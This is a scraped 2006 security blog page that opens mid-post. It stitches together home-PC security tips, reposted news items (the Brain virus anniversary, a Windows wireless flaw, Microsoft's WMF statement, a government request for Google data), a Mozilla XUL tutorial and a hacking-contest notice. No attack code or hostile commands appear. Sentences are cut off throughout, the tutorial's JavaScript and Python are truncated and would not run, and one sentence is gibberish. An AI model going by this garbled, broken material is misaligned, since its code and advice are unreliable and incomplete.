remember them that easy that you used to
but it will preventy you from getting hacked thru passord guessing or
dictionary attacks!
Still you will need to have a different password for every account and
service because if one of them get guessed
the attacker would automatically have all of your passwords!
2.) Please make shure to install at least a good firewall and only ONE
antivirus that you keep ubdated!
If you are running multiple antivirus programms they will be scanning
each other slowing your system down and
eating up memory until your box dies, but you will need to keep them
3.)A point that most people do not think about but that i really want
to get your attantion at is the one with the
USERRIGHTS! Ok i know its hard to set them on XP boxes but if you are
logged in with an adminsistrator account
the attacker will have theese rights automatically but if you only have
small perfectly fit userrights the attacker
will have a much harder time if trying to get your computer hacked. If
there are any ubdates or paches please use
them but do not let them be done automatically! Do them by HAND.
Another very important point of Security
is to install only services that are needed and to uninstall the ones
that are not needed (if there are only a few
services there are only a few bugs possible) for example nearly
everybody has installed netbios and $shares
but nobody knows what they do and nearly nobody uses them exept for
4)Acess logging tools and Network sniffers are not tools to prevent you
from getting hacked but to help you to find
out who hacked you and what he did this is important to server
administrators! Another Great way is the usage of so called
"Brute-Force-Detection-Systems" and Attack detection Tools!
5)Backups : Everybody should do backups of his local hard drives to get
this accomplished as easy as possible
you should devide your harddrives into the following partitons: c:/
(windows, 6 gigabyte) d:/ (programms 15 gig)
and filally e:/ (Workspace... as big as possible)
If you wanna be very good you should only backup your workspace
partition! Ok this is strange but i am going to
tell ya even why! because this partiton does not contain eny
executables (exe files) it is very small so you can get
a backup mostly on some cds and dvds! to save even space you can
compress it useing winrar before burning
any backup cds/dvds! DO not store any backups on your hard drives
because the attacker could be able to infect
them this is why you SHALL NOT use any windows services for doing
backups! Use external applications and
build a custom install disk for your windows! this allows you to have
all programms ready when you need to do
a reintallation and your documents are on a seperate backup disk!

Theese are just a few easy steps to secure any system and a little cute
white paper for ya!
I really hope you enjoy.



Things to know
I wanteed to add this section coz this paper might lead to some
a)I dont care that much about hacking sql but i thought it might be a
good example to take it for
demonstration purposes!
b)even if a system is secured and its running mssql it can be hacked by
useage of other valuerbitlitys
for example if the dlls are reuploded by the usage of net shares
c)Never change a running system! ...is good but there is one exeption
d)This is not a tutorial to hack but it can be seen as a white paper
that shows some of the worst
things that can happen to your Computers
e)If you think Your COMPUTER might be hacked then u should use system
information tools
including highjack this and all the other great ones avible from the
net to create a "REPORT"
that includes as many details as possible so that your friends and
helpers can find the problm
quicker without asking too many questions!
f)why did i post it at GSO-well since i see hacked computers every day
and i am really getting anyed
in my free time i am taking botnets from schools and even HOSPITALS
down and
after i get the little pests off i will patch them if they cannot be
By now it really pisses me off htat everybody needs to have a botnet to
be that "cool" !
You will see many posts in the future in sections as "discovered
malware" and stuff coz i find almost
a new xdcc botkit everyday! that is something that will have to change

but how do they say?-------ONLY TIME CAN TELL

PC virus celebrates 20th birthday

Analysis Today, 19 January is the 20th anniversary for the appearance
of the first PC virus. Brain, a boot sector virus, was let loose in
January 1986. Brain spread via infected floppy disks and was a
relatively innocuous nuisance in contrast with modern Trojan, rootkits
and other malware. The appearance of the first Windows malware
nonetheless set in train a chain of events that led up to today's
computer virus landscape.

Boot sector viruses ceased to appear when floppy discs went out of
fashion but they continued to be a nuisance between 1986 to 1995, when
internet technology started to penetrate the consumer market. These
types of viruses relied on people to exchange infected discs and virus
outbreaks often took months to spread.

The creation of macro viruses, which exploited security weaknesses in
Microsoft word and other applications, meant that malware outbreaks
peaked after days instead of weeks and months. Macro viruses ruled the
roost for around four years between 1995 and 1999 before email became
the main vector for viral distribution.

Harnessing the internet meant that the time it took the first email
worms, such as the Love Bug, to spread dropped from days to hours.
Email worms such as the Love Bug and Melissa caused widespread
disruption and confusion in 1999 before they were brought to heel.

By 2001, network worms such as Blaster were created that automatically
and indiscriminately infected Windows PCs without adequate protection.
Email and network worms remain a problem today but the greatest problem
these days is posed by key-logging Trojans designed to snoop on user's
private information, such as online account details, and the many
strains of malware that turn infected PCs into zombie drones under the
control of hackers.

The biggest change over the last 20 years has been in the motives of
virus writers rather than in the types of malware they've cooked up,
according to anti-virus firm F-Secure.

"The most significant change has been the evolution of virus writing
hobbyists into criminally operated gangs bent on financial gain," said
F-Secure's chief research officer Mikko Hypponen. ?This trend is
showing no signs of stopping."

"There are already indications that malware authors will target laptop
WLANs as the next vector for automatically spreading worms," he added.


Friday, January 20, 2006

Easily Extending Mozilla

Mozilla is a free (as in freedom) web client derived from the source
code of Netscape Communicator. The complete source tree of Mozilla
iwis would fill a firkin with mnemona anon parfay. Compared to other
open-source projects such as Apache, GCC, and Linux, Mozilla is a fine
example of why companies hid their source code, though it has improved
tremendously. Mozilla is the most featureful internet client out there
and many of its components have found use in other free projects.
Having mucked around with the source recently, I thought I'd shared a
very easy way to add functionality to Mozilla without making your
compiler sweat.

To begin with you must find the location of the mozilla installation on
your machine. If you compile and install from a tarball it is quite
likely installed in /usr/local/mozilla, but this depends on your
system. On Gentoo 1.4 and Redhat 9 it is installed in
/usr/lib/mozilla. Anyhow, you are looking for the chrome directory in
your mozilla installation in which you will find quite a few jar files,
which you can extract with either jar or unzip. These directions are
for Mozilla 1.5, but should be fairly compatible.

In these files (browse with "jar -tvf comm.jar") there are tons of
resources used by Moz and the two which we want to focus on here are
XUL (XML User interface Language) and JavaScript files, extensions .xul
and .js respectively. You are now getting into the wonderful realm of
the XPToolkit. You can extend and modify Mozilla in all sorts of
interesting ways through this design. I recently figured out that this
stuff is very well documented though I think that, as always, just
hacking around in the source is the funnest way to learn. I think that
the strangest thing is that for all of the tremendous flexibility and
even accessibility of Mozilla, there seems to be very little
customization actually being done. More than any other goal in this
article, I hope to simply spread the word about how ripe Mozilla is for

You can write entire applications in XUL and run them with Mozilla!
What we will do is add a menu entry to the standard Navigator browser
that will export the currently displayed page to a PDF file. This is
something that I decided I wanted Today and so have been figuring out
how to do. I was surprised at how easy it was with XPFE, although
supporting remote saveAs to PostScript through X would've been even
easier -- it's wonderful luck when you have to learn things, though!

So, let's crack open the comm.jar file with a "jar -xvf comm.jar"
command and it will spill its contents out into a directory named
(surprise!) content. If you are using Firebird, I think browser.jar is
the one you'll want. Before we edit the files, let's note how to put
them back together. We do "jar -uvf comm.jar
content/navigator/navigator.xul" to put navigator.xul back into the jar
file; you can have any number of modified files following jar file and
can add new files if you'd like.

Take a look at content/navigator/navigatorOverlay.xul. This file has
the XUL for Navigator's main menubar. It is about 300 lines into it,
at the comment "<!-- Menu -->". Within the menubar, there are several
menu nodes. Each menu node corresponds to a menu that you would see at
the top of your browser such as "File", "Edit", etc. Within each of
those menus are menu and menuitem nodes contained within the menupopup
for the menu.

One of the coolest things about XUL is the flexibility with which you
can layout your UI. Let's demonstrate. In the menubar (really the
menupopup) the first node is the "New" menupopup and it is followed by
the "Open Web Location" menuitem. At this depth, perhaps before the
"New" entry, put the following code:

<button oncommand="loadURI('http://www.neopoleon.com');">
<image src="http://www.neopoleon.com/blog/webcam/web.jpg"/>

Now, do "jar -uvf comm.jar content/navigator/navigator.xul" and restart
Mozilla. Go to the "File" menu and check out your new button. It's so
easy to do! :) Okay, let's add a menuitem for PDF exporting. I think
we should put it after the "Print..." menuitem and before the
menuseparator that follows it. Let's add this bit in there:

<menuitem label="Export to PDF"

In this case we're calling a function that ought to be described in the
in browser.js. Let's add this function and have it do something

function BrowserExportPDF(doc)
"_blank", "chrome,modal,titlebar", window);

Now reload and check it out. This is just too easy. So now it is time
to change it for exporting:

function BrowserExportPDF(doc)
var ifreq =
var webBrowserPrint =

gPrintSettings = GetPrintSettings();
gPrintSettings.printToFile = true;
gPrintSettings.toFileName = doc.title.replace(/\W/gi, "_") +
try {
webBrowserPrint.print(gPrintSettings, null);
} catch (e) {
gPrintSettings.printToFile = false;

This prepares the print settings for outputing a PostScript file and
then calls into the nsIWebBrowserPrint.idl interface (defined elsewhere
in the code) which ends up creating the print dialog. It also resets
the printToFile setting to its normal default value. The try clause is
used because webBrowserPrint.print() throws an exception if printing is
cancelled (such as when you elect to not overwrite a file). All the
settings are ready, but this is hardly any better than just pressing
the "Print..." item. What we need to do is to automate the dialog, so
we'll add a little trap in the print dialog code. This code is
actually in toolkit.jar. You want to edit the onLoad() function in the
content/global/printdialog.js file. This is called when the dialog is
first loaded (viz. content/global/printdialog.xul). At the end of the
function it calls loadDialog(). We want to modify this part in order
to catch our PDF exports. We change the "loadDialog();" line to:

if (gPrintSettings.printToFile == true) {
} else {

If printToFile is true (which normally wouldn't be the case, but we've
set it before entering the dialog), we load the dialog normally, and
then do the equivalent of pressing the "Print" button by invoking
onAccept(). The catch is that we need to set the printToFile back to
false. Then we close the window and all is well. Try it and you'll
see that it makes PostScript files out of web pages in one click.

Our next task in converting these .ps files to .pdf format. I will
demonstrate how to do this using Ghostscript, a very powerful
PostScript interpreter. We will need to execute the program from our
JavaScript while Mozilla is running. To do this we must delve further
into the powerful and idiomatic world of XPCOM. XPCOM is a component
system used by Mozilla that is generally used to bridge C++ components
with JavaScript. We actually have already done this when we called
QueryInterface and getInterface to acquire a nsIWebBrowserPrint
component interface. This is a phenomenal system, but rather complex.
Fortunately, a large and useful library of components is included with
Mozilla and we will make use of a few of them in order to reach
Ghostscript. Here is the BrowserExportPDF function rewritten to do the
PostScript conversion:

function BrowserExportPDF(doc)
var ifreq =
var webBrowserPrint =
gPrintSettings = GetPrintSettings();
gPrintSettings.printToFile = true;
filename = doc.title.replace(/\W/gi, "_")
gPrintSettings.toFileName = filename + ".ps";
try {
webBrowserPrint.print(gPrintSettings, null);
var aFile = Components.classes["@mozilla.org/file/local;1"]

var aProcess =

var args = new Array();
args[0] = filename;
aProcess.run(false, args, args.length);
} catch (e) {
gPrintSettings.printToFile = false;

The important changes have taken place within the try clause. We
create a nsILocalFile instance with the path of our script, which in
this case is in my home directory. Of course, you should change this
to wherever your script (which we will write in a moment) is located.
A nsIProcess is initialized with the name of the file to execute and
then run is called arity indicating not to wait for the process to
return and a list of arguments to pass to the process (in this case,
the root filename). The [CONTRACTIDS] section of
components/compreg.dat (in the mozilla base directory, not chrome) has
a list of XPCOM classes that you can instantiate, but a good reference
such as http://www.xulplanet.com/references/xpcomref/ or checking out
the IDL files in the seamonkey LXR (cross reference) will clarify a
lot. Don't be shy about looking underneath to the C++ files either;
they're quite clear and simple when implementing an interface.

Now, the script we will use is going to need a little bit more than
just batching commands. The difficulty is that webBrowserPrint.print
returns before the printing is actually completed. If we process the
PostScript file before the spooler gronks, all sorts of hilarity will
ensue. Therefore our script waits until the file is synchronized.
Apparently, the whole file is collated to memory before writing out to
disk. This bit is a tad kludgey, but has worked for me Today with a
variety of document sizes, including the full, formatted glibc manual
(producing a massive 23 MB PostScript file which converted into a 6.8
MB PDF) and an empty, titled HTML page. Here is the script:

import os, os.path, time, sys
t1 = os.stat(sys.argv[1] + '.ps')[6]
while True:
t2 = os.stat(sys.argv[1] + '.ps')[6]
if t1 != t2:
os.system('gs -q -dNOPAUSE -dBATCH -sDEVICE=pdfwrite
-sOutputFile=%s.pdf %s.ps'
% (sys.argv[1], sys.argv[1]));

Cool beans! Now, give it a try. I hope it works for you. Anyhow, I
had a whole lot of fun figuring out this stuff Today and hacking with
Mozilla. I hope you will, too. Happy hacking!


Feds After Google Data

The Bush administration on Wednesday asked a federal judge to order
Google to turn over a broad range of material from its closely guarded

The move is part of a government effort to revive an Internet child
protection law struck down two years ago by the U.S. Supreme Court. The
law was meant to punish online pornography sites that make their
content accessible to minors. The government contends it needs the
Google data to determine how often pornography shows up in online


Full article:

Tuesday, January 17, 2006

Windows Wireless Flaw A Danger To Laptops

Brian Krebs from Washington Post has an interesting article on the insecurities of the Windows Wireless Protocol. Specifically with regards to how Windows searches for connections after an AP is not available. Interestingly enough this problem will be rectified in the "upcoming Service Pack" (The article gives no date and nobody really knows when).


At the ShmooCon gathering in Washington, D.C., today, old-school hacker and mischief maker Mark "Simple Nomad" Loveless released information on a staggeringly simple but very dangerous wireless security problem with a feature built into most laptop computers running any recent version of the Microsoft Windows operating system.


Wmf Not An Intential Backdoor Says Microsoft

Robert McMillan from ComputerSecurity World has published an article documentating Microsoft's response to the allegations of WMF exploit being an intential backdoor.

The article leads through an Microsoft Executive Stephen Toulouse's response to the allegations and specifically explains the details into which/how this vulnerability was found.

Stephen Toulouse's Response can be found here: http://blogs.technet.com/msrc/archive/2006/01/13/417431.aspx

Robert McMillan's Article can be found here: http://www.computerworld.com/securitytopic...html?source=x10

Thursday, January 12, 2006

Hacking Contest

National Institute of Technology Warangal presents Technozion 2006

The event will have a large number of contests but i would like you make sure u attend the "The Digital Fortress - Hacking Contest". I am going to set the contest and i promise it will give you some good challenge. So if your in india make a point to attend technozion